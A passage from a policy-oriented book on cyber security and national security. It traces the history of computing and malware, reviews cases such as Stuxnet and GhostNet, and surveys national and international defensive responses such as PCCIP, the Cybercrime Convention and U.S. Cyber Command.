Pas-de-Calais and not Normandy. This gave Allied forces critical time to establish a foothold on the continent and change the course of history.7 What military officers call the “battlespace” grows more difficult to define – and to defend – over time. Advances in technology are normally evolutionary, but they can be revolutionary – artillery reached over the front lines of battle; rockets and airplanes crossed national boundaries; today cyber attacks can target political lead- ership, military systems, and average citizens anywhere in the world, during peace- time or war, with the added benefit of attacker anonymity. Narrowly defined, the Internet is just a collection of networked computers. But the importance of “cyberspace” as a concept grows every day. The perceived threat is such that the new U.S. Cyber Command has declared cyberspace to be a new domain of warfare,8 and the top three priorities at the U.S. Federal Bureau of Investigation (FBI) are preventing terrorism, espionage, and cyber attacks.9 Cyber warfare is unlike traditional warfare, but it shares some characteristics with the historical role of aerial bombardment, submarine warfare, special operations forces, and even assassins. 
Specifically, it can inflict painful, asymmetric damage on an adversary from a distance or by exploiting the element of surprise.10 The post-World War II U.S. Strategic Bombing Survey (USSBS) may hold some les- sons for cyber war planners. The USSBS concluded that air power did not perma- nently destroy any indispensable adversary industry during the war, and that “per- sistent re-attack” was always necessary. Nonetheless, the report left no doubt about its ultimate conclusion: 7 Kelly, 2011. 8 “Cyber Command’s strategy...” 2011. 9 From the FBI website: www.fbi.gov. 10 Parks & Duggan, 2001. 13 Cyber Security and National Security ... Allied air power was decisive in the war in Western Europe ... In the air, its victory was complete. At sea, its contribution ... brought an end to the enemy’s greatest naval threat – the U-boat; on land, it helped turn the tide overwhelmingly in favor of Allied ground forces.11 Cyber attacks are unlikely to have the lethality of a strategic bomber, at least for the foreseeable future. But in the end, the success of military operations is effects- based. If both a ballistic missile and a computer worm can destroy or disable a target, the natural choice will be the worm. In May 2009, President Obama made a dramatic announcement: “Cyber intruders have probed our electrical grid ... in other countries, cyber attacks have plunged entire cities into darkness.”12 Investigative journalists subsequently concluded that these attacks took place in Brazil, affecting millions of civilians in 2005 and 2007, and that the source of the attacks is still unknown.13 National security planners should consider that electricity has no substitute, and all other infrastructures, in- cluding computer networks, depend on it.14 In 2010, the Stuxnet computer worm may have accomplished what five years of United Nations Security Council resolutions could not: disrupt Iran’s pursuit of a nuclear bomb.15 If true, a half-megabyte of computer code quietly substituted for air strikes by the Israeli Air Force. Moreover, Stuxnet may have been more effective than a conventional military attack and may have avoided a major international cri- sis over collateral damage. To some degree, the vulnerability of the Internet to such spectacular attacks will provide a strong temptation for nation-states to take advan- tage of computer hacking’s perceived high return-on-investment before it goes away. If cyber attacks play a lead role in future wars, and the fight is largely over owner- ship of IT infrastructure, it is possible that international conflicts will be shorter and cost fewer lives. A cyber-only victory could facilitate post-war diplomacy, economic recovery, and reconciliation. Such a war would please history’s most famous mili- tary strategist, Sun Tzu, who argued that the best leaders can attain victory before combat is necessary.16 It may be unlikely, however, that an example like Stuxnet will occur frequently. Mod- ern critical infrastructures present complex, diverse, and distributed targets. They 11 United States Strategic Bombing Survey, 1945. 12 “Remarks by the President...” 2009. 13 “Cyber War...” 2009. 14 Divis, 2005. 15 Falkenrath, 2011. 16 Sawyer, 1994. 14 INTRODUCTION comprise not one system, technology, or procedure, but many and are designed to survive human failings and even natural disasters. Engineers on-site may see the start of an attack and neutralize it before it becomes a serious threat. 
In short, computer vulnerabilities should not be confused with vulnerabilities in whole infra- structures.17 Cyber attacks may rise to the level of a national security threat only when an adver- sary has invested a significant amount of time and effort into a creative and well- timed strike on a critical infrastructure target such as an electrical grid, financial system, air traffic control, etc. Air defense is an example of a system that plays a strategic role in national security and international relations. It may also represent a particular cyber vulnerability in the context of a traditional military attack. In 2007, for example, it was reported that a cyber attack preceded the Israeli air force’s destruction of an alleged Syrian nuclear reactor.18 Military leaders, by virtue of their profession, should expect to receive Denial of Ser- vice (DoS) attacks against their network infrastructure. As early as the 1999 Kosovo war, unknown hackers attempted to disrupt NATO military operations via the Inter- net and claimed minor victories.19 In future conflicts, DoS attacks may encompass common network “flooding” techniques, the physical destruction of computer hard- ware, the use of electromagnetic interference,20 and more. Terrorists do not possess the unqualified nation-state backing that militaries enjoy. As a consequence, they may still believe that the Internet poses more of a danger than an opportunity. Forensic examination of captured hard drives proves that terrorists have studied computer hacking,21 and Western economies are a logical target. For example, ten- sion in the Middle East is now always accompanied by cyber attacks. During the 2006 war between Israel and Gaza, pro-Palestinian hackers successfully denied ser- vice to around 700 Israeli Internet domains.22 But a long-term, economic threat from cyber terrorists may be illogical. In a global- ized, interconnected world, a cooperative nation-state would only seem to be hurt- ing itself, and a terrorist group may crave a higher level of shock and media atten- 17 Lewis, 2002. 18 Fulghum et al, 2007. 19 Verton, 1999; “Yugoslavia...” 1999. 20 Designed to destroy electronics via current or voltage surges. 21 “Terrorists...” 2006. 22 Stoil & Goldstein, 2006. 15 Cyber Security and National Security tion than a cyber attack could create.23 Former U.S. Director of National Intelligence (DNI) Mike McConnell has argued that a possible exception could be a cyber attack on the public’s confidence in the financial system itself, specifically in the security and supply of money.24 All things considered, cyber attacks appear capable of having strategic consequenc- es; therefore, they must be taken seriously by national security leadership. At the national and organizational levels, a good starting point is methodical risk manage- ment, including objective threat evaluation and careful resource allocation. The goal is not perfection, but the application of due diligence and common sense. The pertinent questions include: • What is our critical infrastructure? • Is it dependent on information technology? • Is it connected to the Internet? • Would its loss constitute a national security threat? • Can we secure it or, failing that, take it off-line? Objectivity is key. Cyber attacks receive enormous media hype, in part because they involve the use of arcane tools and tactics that can be difficult to understand for those without a formal education in computer science or information technology. 
As dependence on IT and the Internet grow, governments should make proportional investments in network security, incident response, technical training, and interna- tional collaboration. However, because cyber security has evolved from a technical discipline to a strate- gic concept, and because cyber attacks can affect national security at the strategic level, world leaders must look beyond the tactical arena. The quest for strategic cyber security involves marshaling all of the resources of a nation-state. Therefore, the goal of this research is to evaluate nation-state cyber attack mitiga- tion strategies. To support its arguments and conclusions, the author employs the Decision Making Trial and Evaluation Laboratory (DEMATEL). 23 Lewis, 2010. CSIS’s Lewis recently stated: “It remains intriguing and suggestive that [terrorists] have not launched a cyber attack. This may reflect a lack of capability, a decision that cyber weapons do not produce the violent results terrorists crave, or a preoccupation with other activities. Eventually terrorists will use cyber attacks, as they become easier to launch...” 24 “Cyber War...” 2009. 16 INTRODUCTION The Nature and Scope of this Book Today, world leaders fear that cyber terrorism and cyber warfare pose a new and perhaps serious threat to national security – the Internet is a powerful resource, modern society is increasingly dependent upon it, and cyber attackers have demon- strated the capability to manipulate and disrupt the Internet for a wide variety of political and military purposes. There is a clear need for national security planners to prepare cyber defenses at both the tactical and strategic levels. The goal of this research is to help decision makers with the latter – to choose the most efficient courses of action to take at the strategic level in order to defend their national interests in cyberspace. Beyond its Introduction and Conclusion, this book has three primary parts. First, it explores the changing nature of cyber security, tracing its evolution from a technical discipline to a strategic concept. Second, it evaluates four approaches to improving the cyber security posture of a nation-state – Internet Protocol version 6 (IPv6), the application of Sun Tzu’s Art of War to cyber conflict, cyber attack deterrence, and cyber arms control. Third, it employs the Decision Making Trial and Evaluation Laboratory (DEMATEL) to analyze the key concepts covered and to prioritize the four cyber security strategies. The four cyber attack mitigation strategies – IPv6, Art of War, deterrence and arms control – fall into several categories. IPv6 is a technical solution. Art of War is mili- tary. The third and fourth strategies are hybrid: deterrence is a mix of military and political considerations; arms control is a political/technical approach. There are significant limitations to this research. Cyberspace is complex, dynamic, and constantly evolving. National security planning involves a wide array of fallible human perceptions and at times irrational decision-making at both the national and international levels. At a minimum, strategic cyber security demands a holistic investigation, subject to the particular context of different nations. These complexi- ties serve to limit the aspiration of this research to an initial policy evaluation that addresses the needs of a theoretical nation-state. 
Data collection for this research consisted primarily of peer-reviewed scientific literature and the author's direct observation of events such as the 2010 Cooperative Cyber Defence Centre of Excellence/Swedish National Defence College cyber defense exercise (CDX), "Baltic Cyber Shield." Data analysis is almost exclusively that of the author,25 whose personal experience as a cyber security analyst spans over a decade.

25 Three chapters were co-written by colleagues with a very strong technical background.

The validation of this research rests on peer-review, to which every chapter has been subjected. It encompasses fourteen articles related to strategic cyber security, eleven written solely by the author, six of which are listed in the Thomson Reuters ISI Web of Knowledge.

The author is ideally placed to conduct this research. Since 2007, he has been a Scientist at the North Atlantic Treaty Organization (NATO) Cooperative Cyber Defence Centre of Excellence in Tallinn, Estonia.26 Previously, he was the Division Chief for Cyber Analysis at the Naval Criminal Investigative Service (NCIS) in Washington, DC.

26 The Centre's vision is to be NATO's primary source of expertise in the field of cooperative cyber defense research. As of mid-2011, the Centre employed cyber defense specialists from nine different Sponsoring Nations.

Research Outline

This book seeks to help nation-states mitigate strategic-level cyber attacks. It has five parts.

I. Introduction: Cyber Security and National Security
II. Birth of a Concept: Strategic Cyber Security
III. Nation-State Cyber Attack Mitigation Strategies
IV. Data Analysis and Research Results
V. Conclusion: Research Contributions

Part II explores the concept of "strategic" cyber security, moving beyond its tactical, technical aspects – such as how to configure a firewall or monitor an intrusion detection system – to defending the cyberspace of a nation-state. It provides the foundation and rationale for Parts III and IV, and has three chapters.

2. Cyber Security: A Short History
3. Cyber Security: A Technical Primer
4. Cyber Security: Real World Impact

Part III of this book asks four research questions, which highlight four likely strategic approaches that nations will adopt to mitigate the cyber attack threat and to improve their national cyber security posture.

5. The Next-Generation Internet: can Internet Protocol version 6 (IPv6) increase strategic cyber security?
6. Sun Tzu's Art of War: can the world's best military doctrine encompass cyber warfare?
7. Cyber attack deterrence: is it possible to prevent cyber attacks?
8. Cyber arms control: can we limit cyber weapons?

Part IV employs the Decision Making Trial and Evaluation Laboratory (DEMATEL) to analyze the key concepts covered in this book and to prioritize the four proposed cyber attack mitigation strategies addressed in Part III. Its goal is to help decision makers choose the most efficient ways to address the challenge of improving cyber security at the strategic level.

9. DEMATEL and Strategic Analysis
10. Key Findings

Part V, the Conclusion, summarizes the contributions of this book and provides suggestions for future research.

II. BIRTH OF A CONCEPT: STRATEGIC CYBER SECURITY

2. CYBER SECURITY: A SHORT HISTORY

Human history is often marked by revolutions in science and technology.
During the Industrial Revolution, for example, the steam engine worked miracles for our mus- cles. Standardization and mass production dramatically lowered the cost of manu- factured goods by decreasing the amount of human energy required to make them. We are now in the middle of the Information Revolution. The computer is in effect a steam engine for our brains. It dramatically facilitates the acquisition and validation of knowledge. The primary goal of building the first computers was simple – to cre- ate a machine that could process calculations faster than a human could by hand. In due course, scientists were able to accomplish that and much, much more. Chapter 2 of this book outlines the primary historical events that have transformed cyber security from a technical discipline to a strategic concept. The Power of Computers In 1837, Cambridge University Professor Charles Babbage designed the “Analytical Engine,” a surprisingly modern mechanical computer that was never built because it was about 100 years ahead of its time. Historically, national security considerations have been the prevailing wind behind the development of Information Technology (IT).27 In 1943, the U.S. military com- missioned the world’s first general-purpose electronic computer, the Electronic Nu- merical Integrator and Computer (ENIAC). This collection of 18,000 vacuum tubes was designed to compute ballistic trajectories at 100,000 “pulses” per second, or 100 times faster than a human with a mechanical calculator. ENIAC smashed all expectations, calculating at speeds up to 300,000 times faster than a human. After WWII, cutting-edge computers began to demonstrate their value outside the military realm. UNIVAC I,28 the first commercial computer produced in the United 27 Commercially, companies such as International Business Machines (IBM) had found success in marketing electro-mechanical devices by 1900. 28 The Universal Automatic Computer I had a clock speed of 2.5 MHz, a central memory of 1,000 91-bit words, and a peak rate of 1,000 FLOPS, or about 1/1,000,000th the speed of a CRAY-2. 20 BIRTH OF A CONCEPT: STRATEGIC CYBER SECURITY States, correctly predicted the results of the 1952 Presidential election based on a sample of just 1%. But the Information Revolution had only just begun. The arrival of the personal com- puter (PC) left a much deeper impact on the Earth. The invention of the microproces- sor, random-access storage, and software of infinite variety allowed anyone to own a “personal mainframe” with demonstrable scientific and engineering capabilities.29 Information Technology (IT) now pervades our lives. In 1965, Gordon Moore cor- rectly predicted that the number of transistors on a computer chip would double every two years.30 There has been similar growth in almost all aspects of informa- tion technology (IT), including the availability of practical encryption, user-friendly hacker tools, and Web-enabled open source intelligence (OSINT). The physical limits of desktop computing are approaching. For example, electronic circuitry may be reaching its minimum physical size, and the maximum rate at which information can move through any computer system may be limited by the finite speed of light. However, the simultaneous rise of “cyberspace” solves this problem. 
In 2010, there were nearly one billion computers connected directly to the Internet, and over 1.5 billion Internet users on Earth.31 Today, a reliable connection to the Internet is more important than the power of one’s computer and provides infinitely greater utility to the user. The Rise of Malicious Code Together, computers and computer networks offer individuals, organizations, and governments the ability to acquire and exploit information at unprecedented speed. In business, diplomacy, and military might, this translates into a competitive advan- tage, suggesting that brains will beat brawn with increasing frequency over time and that computer resources will play a central role in future human conflict. The original meaning of the term “hacker” was quite positive. It meant a very clever user of technology, specifically someone who modified hardware or software in or- der to stretch its limits, especially to take it beyond where its inventors had intended 29 Miller, 1989. 30 “Moore’s Law...” www.intel.com. 31 These figures are from The World Factbook, published by the Central Intelligence Agency: “Internet hosts” are defined as a computer connected directly to the Internet, either from a hard-wired terminal, or by modem/telephone/satellite, etc. 21 Cyber Security: A Short History it to go. Over time, however, the criminalization of hacking has led to a decay of the word’s original meaning. Regardless of a hacker’s intentions, there are three basic forms of cyber attack32 that national security planners should keep in mind. The first type of attack targets the confidentiality of data. It encompasses any un- authorized acquisition of information, including via “traffic analysis,” in which an attacker infers communication content merely by observing communication pat- terns. Because global network connectivity is currently well ahead of global and local network security, it can be easy for hackers to steal enormous amounts of sensitive information. For example, in 2009 a Canadian research group called Information Warfare Moni- tor revealed the existence of “GhostNet,” a cyber espionage network of over 1,000 compromised computers in 103 countries that targeted diplomatic, political, eco- nomic, and military information.33 The second type of attack targets the integrity of information. This includes the “sabotage” of data for criminal, political, or military purposes. Cyber criminals have been known to encrypt the data on a victim’s hard drive and then demand a ransom payment in exchange for the decryption key. Some countries with poor human rights records have been accused of editing the email and blog entries of their citizens.34 The third type of attack targets the availability of computers or information resourc- es. The goal here is to prevent authorized users from gaining access to the systems or data they require to perform certain tasks. This is commonly referred to as a denial-of-service (DoS) and encompasses a wide range of malware, network traffic, or physical attacks on computers, databases, and the networks that connect them. 
In 2001, “MafiaBoy,” a 15 year-old student from Montreal, conducted a successful DoS attack against some of the world’s biggest online companies, likely causing over $1 billion in financial damage.35 In 2007, Syrian air defense was reportedly disabled by a cyber attack moments before the Israeli air force demolished an alleged nuclear reactor.36 And the Burmese government, during a government crackdown on politi- cal protestors, completely severed its Internet connection to the outside world.37 32 The term “cyber” is used generically to describe computers, networks, and digital information. 33 “Tracking GhostNet...” 2009. 34 Geers, 2007a. 35 Verton, 2002. 36 Fulghum et al, 2007. 37 Tran, 2007. 22 BIRTH OF A CONCEPT: STRATEGIC CYBER SECURITY If computer users were isolated from one another, computer security management would be straightforward and rely primarily on personnel background checks and padlocks. But the benefits of networking are too great to ignore. Modern organiza- tions require Internet connectivity. The trick is to find the right balance between functionality, performance, and secu- rity. It is impossible to optimize the equilibrium with respect to all attacks. Before a military operation, if every soldier knew every detail of the plan, morale and readi- ness might improve, but it would be far easier for the enemy to become witting as well. On the other hand, when too few soldiers are in the know, the odds of success are lower.38 As during WW II, the national security community continued to lead the way. By 1967, the U.S. military had configured an IBM System/360 network with discrete levels of clearance, compartments, need-to-know, and centralized authority control. In the civilian world, however, system administrators could not prevent users from reading the data of another user until 1970. And even then, the administrative goal was to prevent accidental data corruption, not to protect users from one another.39 As Internet connectivity grew, malicious users and computer hackers were able to conduct increasingly asymmetric attacks. In theory, an attacker can target all Inter- net-connected computers simultaneously, with an attack that travels at near light- speed. The strength of the Internet – an accessible, collaborative framework based on common technologies and protocols – unfortunately makes it vulnerable to novel attacks and susceptible to swift and massive damage. The notion of a computer worm or virus dates to 1949, when the mathematician John von Neumann proposed “self-replicating automata.” However, such malware remained in an experimental stage40 until the early 1990s.41 Hackers wrote viral programs such as the Creeper worm, which infected ARPANET42 in 1971 and a 1988 Internet virus that exploited weak passwords in SUN and VAX computers. However, these programs did not yet attempt to steal or destroy data.43 38 Saydjari, 2004. 39 Saltzer & Schroeder, 1975. 40 These were primarily boot-sector viruses that targeted MS DOS. 41 Chen & Robert, 2004. 42 The U.S. Advanced Research Projects Agency Network. 43 Eichin & Rochlis, 1989. 23 Cyber Security: A Short History During the 1990s, as the number of Internet users grew exponentially, there was an explosion of malware, in both quantity and quality. 
In 2003, a DARPA44-funded study45 categorized the known Internet worms46 by attacker motivation: • experimental curiosity (Morris/ILoveYou), • non-existent or non-functional payload (Morris/Slammer), • backdoor creation for remote control (Code Red II), • HTML proxy, spam relay, phishing (Sobig), • DoS (Code Red/Yaha), • Distributed DoS (Stacheldraht), • criminal data collection, espionage (SirCam), • data damage (Chernobyl/Klez), and • political protest (Yaha). Clearly, the goal of computer hacking is limited only by the attacker’s imagination. The DARPA study speculated that future worms could facilitate human surveillance, commercial advantage, the management of distributed malware, terrorist recon- naissance, and even the manipulation of critical infrastructures in support of cyber war objectives. Why are hackers so successful, and are we improving our defenses against them? Fortunately, an enormous amount of attention has been drawn to cyber security. For example, in 2002, Microsoft advertised its Trustworthy Computing Initiative, de- claring that security would henceforth be at the forefront of Window’s development. 44 The U.S. Defense Advanced Research Projects Agency. 45 Five worm characteristics were analyzed: target discovery, method of transmission, code activation, payload, and attacker motivation. Motivation is normally learned by studying the payload, or the non- propagation code, of malware. 46 A computer worm is a program that self-propagates across a network, exploiting security or policy flaws in widely-used services. Viruses typically infect non-mobile files and normally require some user action to move them across a network. Thus the propagation rate of a worm is typically much faster than with a virus. 24 BIRTH OF A CONCEPT: STRATEGIC CYBER SECURITY Unfortunately, many common computer vulnerabilities are of a persistent nature.47 These include: • the high cost of producing quality software,48 • technical challenges associated with software patch deployment, • susceptibility of the commonly-used C/C++ languages to buffer overflows and code-injection,49 • use of administrator rights by common system and user programs,50 and • the prevalence of “monoculture” computing environments.51 The computer security problem space is both broad and deep. In terms of quantity, in the single month of May 2009, Kaspersky Lab identified 42,520 unique samples of possible malware on its clients’ computers. In terms of quality, the cyber defense community is currently analyzing the most sophisticated piece of malware yet found – Stuxnet.52 This worm targeted national critical infrastructures, specifically the SCADA53 systems used to manage major in- dustrial installations such as power grids and the Programmable Logic Controllers (PLCs) used to control devices such as pumps and valves. Stuxnet’s propagation strategy is a wonder to behold. It exploits at least four zero- day54 vulnerabilities and employs two stolen digital certificates.55 It targets “air- gapped”56 networks via removable USB drives and is smart enough to attempt its exploits only when connected to a SCADA environment. Finally, in 2010, most of the 47 Weaver et al, 2003. 48 Unfortunately, even the most robust and scrutinized software, such as OpenSSH, OpenSSL and Apache, have been shown to contain major security vulnerabilities. 49 These refer to attacks that target ostensibly inaccessible computer memory space and the exploitation of flaws in a computer program to insert unauthorized hacker code. 
50 Hackers take advantage of the fact that malicious code normally runs at the level of the user who executes it. This is why one should never surf the Web from an Administrator account. 51 The Windows operating system, for example, commands about 90% of the desktop market share. 52 Stuxnet was discovered by a Belarusian anti-virus firm in June 2010, but the worm had been active on the Internet, undetected, for at least one year. 53 Supervisory Command and Data Acquisition. 54 Zero-day vulnerabilities are computer weaknesses that are unknown to the cyber defense community, which a witting attacker may exploit at will. 55 Digital certificates contain sensitive and hard-to-acquire cryptographic information that is used to verify identities via the Internet. 56 Air-gapped networks are not physically connected to the Internet. 25 Cyber Security: A Short History infected machines were located in a country of high interest to intelligence agencies around the world – Iran.57 A strategic challenge for cyber defense is that the Internet evolves so quickly it is impossible for any organization to master all of the latest developments. Over time, attackers have subverted an ever-increasing number of operating systems, applica- tions, and communications protocols. Defenders simply have too much technical ground to cover, which is to a hacker’s advantage and places a premium on defen- sive creativity, good intelligence, and some level of automated attack detection and response. Lone Hacker to Cyber Army Information operations are surely as old as warfare itself. A well-known example from the 20th century is the spectacular effort by the Allies to convince the Ger- man military leadership that the D-Day invasion would take place at Pas-de-Calais instead of Normandy.58 The first mention of a forthcoming “information war” in cyberspace is attributed to Thomas Rona, the author of a 1976 Boeing Corporation research paper entitled “Weapon Systems and Information War.”59 Rona perceived that computer networks were both an asset and a liability for any organization. Once a mission came to rely on the proper functioning of IT for success, computer systems would be among the first targets in war. Rona argued that all information flows within any command- and-control system are vulnerable to jamming, overloading, or spoofing by an ad- versary.60 In 1993, a widely-cited U.S. Naval Postgraduate School (NPS) article examined the historical aspects of “cyberwar.” Its authors argued that the Information Revolu- tion would change not only how wars are fought, but even why wars are fought. IT offered the world such increased organizational efficiency and improved decision- making that traditional hierarchies and political systems would be forced to evolve or die, and even international borders would have to be redrawn. For militaries, IT-enhanced situational awareness was compared to the 13th cen- tury Mongol army’s use of “arrow riders” on horseback to keep national leadership informed of distant battlefield developments with astonishing speed and to the ad- vantage a chess player would have over a blindfolded opponent. Cyberwar could be 57 “Stuxnet...” 2010. 58 Churchman, 2005. 59 Rona, 1976. 60 Van Creveld, 1987. 26 BIRTH OF A CONCEPT: STRATEGIC CYBER SECURITY to the 21st century what blitzkrieg or “lightning war” was to the 20th century, and a standard military goal will be to turn the balance of information control in one’s favor, especially if the balance of conventional forces is not. 
The NPS professors envisioned two levels of Internet conflict: a “netwar” of diploma- cy and propaganda, and “cyberwar,” which would encompass all military operations designed to attack an adversary’s critical IT systems.61 In 2001, computer scientists from the Carnegie Mellon University Computer Emer- gency Response Team (CERT) wrote an article for the NATO Review, “Countering Cyber War,” which argued that cyber attacks would play an increasingly strategic role in warfare and that NATO must immediately begin to plan for the defense of cyberspace. The CERT team described three levels of cyber warfare. The first is a simple adjunct to traditional military operations to gain information superiority, such as by target- ing an air defense system. However, because military functions such as early warn- ing have an intrinsic strategic value to a nation, a successful cyber attack against air defense could lead to strategic losses. The second level is “limited” cyber war. Here, civilian Internet infrastructure be- comes part of the battleground, and the target list includes some civilian enterprises. The third and most serious level is “unrestricted” cyber war. Here, an adversary seeks to cause maximum damage to civilian infrastructure in order to rupture the “social fabric” of a nation. Air-traffic control, stock exchange, emergency services, and power generation systems62 could be targets. The goal is as much physical dam- age and as many civilian casualties as possible.63 In 2001, James Adams revealed in the pages of Foreign Affairs that the U.S. Depart- ment of Defense had in fact put cyber war theories to a real-world test in a classi- fied 1997 Red Team exercise codenamed “Eligible Receiver.” Thirty-five U.S. National Security Agency (NSA) personnel, simulating North Korean hackers, used a variety of cyber and information warfare (IW) tools and tactics, including the transmission of fabricated military orders and news reports, to attack the U.S. Navy’s Pacific Com- mand from cyberspace. The Red Team was so successful that the Navy’s “human command-and-control system” was paralyzed by mistrust, and “nobody ... from the president on down, could believe anything.”64 61 Arquilla & Ronfeldt, 1993. 62 Successful attacks on electricity grids have subsequent, unforeseeable effects on an economy because most infrastructures, including computer systems, rely on electricity to function. 63 Shimeall et al, 2001. 64 Adams, 2001. 27 Cyber Security: A Short History Nonetheless, two important IW thinkers remained dubious. Georgetown University Professor Dorothy Denning agreed that “hacktivism”65 had begun to influence politi- cal discourse, but argued that there had not been a single verifiable case of cyber terrorism, and believed that no cyber attack had yet caused a human casualty.66 Furthermore, James Lewis of the Center for Strategic and International Studies (CSIS) opined that cyber attacks were easy to hype because cyber security is an arcane discipline that is difficult for non-experts to understand. He argued that vul- nerabilities in computers did not equate to vulnerabilities in critical infrastructures, and that terrorists would continue to prefer traditional physical attacks because the likelihood of real-world damage was much higher. While cyber attacks were a grow- ing business problem, they did not yet pose a threat to national security.67 One decade later, it is possible that some militaries have crossed that threshold. 
A 2009 report on the cyber warfare capabilities of the People’s Republic of China (PRC) described a highly-networked force that can now communicate with ease across military services and through chains of command. Furthermore, each mili- tary unit has a clear, offensive cyber mission in times of both war and peace. In peacetime, strategic intelligence is gathered via cyber espionage to help win future wars.68 In war, a broad array of computer network operations (CNO), electronic war- fare (EW), and kinetic strikes will be used to achieve information superiority over an adversary,69 especially during the early or preemptive-strike phases of a conflict.70 Is cyber espionage alone capable of changing the balance of power among nations? By 1999, the U.S. Energy Department had discovered hundreds of attacks on its computer systems from outside the United States and determined that Chinese hacking in particular posed an “acute” intelligence threat to U.S. nuclear weapons laboratories.71 The U.S. Joint Strike Fighter (JSF) is the most expensive weapons program in world history. Unknown hackers have stolen terabytes of JSF design and electronics data72 65 Hacktivism is a combination of hacking and political activism. 66 Denning, 2002. 67 Lewis, 2002. 68 As evidence of state-sponsorship, the report cites sophisticated hacking techniques and the collection of military and China-specific policy information that is of little commercial value. 69 One goal would be to create exploitable “blind spots” in an adversary’s decision cycle that could, for example, lead to the delay of adversary military deployments. 70 Krekel, 2009. 71 Gerth & Risen, 1999. 72 Officials believed that the jet’s most closely-held secrets, which pertained to flight controls and sensors, were safe because they had been stored on computers not connected to the Internet. 28 BIRTH OF A CONCEPT: STRATEGIC CYBER SECURITY in a mammoth case of cyber espionage that has revealed a government’s vulner- ability to the security posture of its civilian contractors and the exasperating task of conducting a cyber battle damage assessment.73 Based on the IP addresses used and other known digital fingerprints, the JSF attacks were believed with a high level of certainty to come from the Chinese military.74 From a strategic perspective, the cyber threat that hits closest to home and may eventually spur international agreements to mitigate the hacker threat relates to critical infrastructure protection (CIP). The potential target list seems endless: air traffic,75 financial sector,76 national elections,77 water,78 even electricity.79 Trends sug- gest that all of the above are increasingly connected to the Internet, and that custom IT systems are over time replaced with less expensive Windows and UNIX systems that are not only easier to use, but easier to hack.80 Have real-world attacks on national critical infrastructures already taken place? In May 2009, President Obama made a dramatic announcement: “Cyber attacks have plunged entire cities into darkness.”81 Investigative journalists subsequently concluded that the attacks took place in Brazil in 2005 and 2007, affected millions of civilians, and that the source of the attacks is still unknown.82 National Security Planning Scientists began to warn the world about the danger of computer hacking shortly after WW II. Technical precautions, at least within the national security community, were implemented by the 1960s. 
73 The hackers encrypted the JSF data they found before removing it from the network, so it was nearly impossible for investigators to determine exactly what had been stolen. JSF electronics run over seven million lines of computer code, more than triple currently used in the top Air Force fighter, so the attackers have potentially found many vulnerabilities to exploit in the future. 74 Gorman et al, 2009. 75 Gorman, 2009a. 76 Wagner, 2010. After the Dow Jones surprisingly plunged almost 1,000 points, White House adviser John Brennan stated that officials had considered but found no evidence of a malicious cyber attack. 77 Orr, 2007. In 2007, California held a hearing on the security of its touch-screen voting machines, in which a Red Team leader testified that the voting system was vulnerable to attack. 78 Preimesberger, 2006. In 2006, the Sandia National Laboratories Red Team conducted a network vulnerability assessment of U.S. water distribution plants. 79 Meserve, 2007. Department of Homeland Security (DHS) officials briefed CNN that Idaho National Laboratory (INL) researchers had hacked into a replica of a power plant’s control system and changed the operating cycle of a generator, causing it to self-destruct. 80 Preimesberger, 2006. 81 “Remarks by the President...” 2009. 82 “Cyber War...” 2009. 29 Cyber Security: A Short History As the size and importance of the Internet grew, however, there was a need for computer security to move from a tactical to a strategic level. And the driving force for national policy was the realization that a combination of persistent computer vulnerabilities and worldwide connectivity had placed national critical infrastruc- tures at risk. In 1997, Bill Clinton established the President’s Commission on Critical Infrastruc- ture Protection (PCCIP). Its final report, Critical Foundations: Protecting America’s Infrastructures, identified eight sectors of the U.S. economy that held strategic se- curity value: telecommunications, electric power, gas and oil, water, transportation, banking and finance, emergency services, and government continuity. PCCIP recognized not only the nation’s dependence on its critical infrastructure (CI), but also the dependence of modern CI on IT systems. Further, it cited “pervasive” vulnerabilities that were open to attack by a “wide spectrum” of potential threats and adversaries. Because the cyber attack threat to CI is strategic in scope, the national response must be equal to the task: public awareness, investment in education, scientific re- search, the development of cyber law, and international cooperation. New agencies and economic “sector coordinators” were also created,83 but PCCIP emphasized that no single individual or organization could be responsible for CIP because critical infrastructures are collective assets that the government and private sector must manage together.84 On December 4, 1998, Russia sponsored United Nations (UN) General Assembly Resolution 53/70, “Developments in the field of information and telecommunica- tions in the context of international security.” It stated that science and technology play an important role in international security, and that while modern information and communication technology (ICT) offers civilization the “broadest positive op- portunities,” ICT was nonetheless vulnerable to misuse by criminals and terrorists. 
UN member states were therefore requested to inform the Secretary-General of their concerns regarding ICT misuse and offer proposals to enhance its security in the future. The UN adopted Resolution 53/70 on January 4, 1999.85 The most successful international cyber security agreement to date – the Council of Europe Convention on Cybercrime – opened for signature in 2001. This treaty takes 83 PCCIP led to many developments relative to cyber security, including Presidential Decision Directive 63 (PDD-63), National Infrastructure Protection Center (NIPC), Critical Infrastructure Assurance Office (CIAO), National Infrastructure Assurance Council (NIAC), Information Sharing and Assessment Centers (ISACs), and DoD Joint Task Force—Computer Network Defense (JTF-CND). 84 Neumann, 1998. 85 “53/70...” 1999. 30 BIRTH OF A CONCEPT: STRATEGIC CYBER SECURITY aim at copyright infringement, fraud, child pornography and violations of network security policy. It offers guidelines to law enforcement regarding data interception and the search of computer networks. Its ultimate goal is a common policy on cyber crime worldwide via national legislation and international cooperation. Currently, the Convention has forty-seven national signatories, thirty ratifications, and is the primary legal instrument available to nation-states with respect to cyber security.86 At the level of national security, the most visible changes in cyber defense strat- egy have taken place within the U.S. military. A turning point occurred in 2008, when unknown hackers successfully compromised classified military systems in the “most significant breach” of U.S. military computers ever. U.S. Deputy Secretary of Defense William J. Lynn wrote in Foreign Affairs that ad- versaries now have the power to disrupt critical U.S. information infrastructure, and that the asymmetric nature of hacking means that a “dozen” computer program- mers can pose a national security threat. Over the long term, Lynn believed that computer hacking can lead to the loss of enough intellectual property to deprive a nation of its economic vitality. The most tangible U.S. response has been the creation of its military Cyber Com- mand in 2010. USCYBERCOM has three primary missions: computer network de- fense, the coordination of national cyber warfare resources, and cyber security liaison with domestic and foreign partners. Its first mission, defense, relies on a combination of traditional best practices in computer security and classified intel- ligence threat information, to create a unique, “active” U.S. cyber defense posture.87 The quest for strategic cyber defense took its most recent step forward in Lisbon, Portugal, in November 2010, where twenty-eight national leaders from the world’s foremost political and military alliance published a new “Strategic Concept” for the North Atlantic Treaty Organization (NATO). This document clearly illustrates the rapid rise in the perceived connection between computer security and national security. The previous Strategic Concept, written in 1999, did not contain a single mention of computers, networks, or hackers. The new document, entitled “Active Engagement, Modern Defence,” describes cyber attacks as “frequent, organized, and costly,” and having now reached a threshold where they threaten “national and Euro-Atlantic prosperity, security and stability.” If NATO hopes to defend the cyber domain, it must improve its ability to prevent, detect, 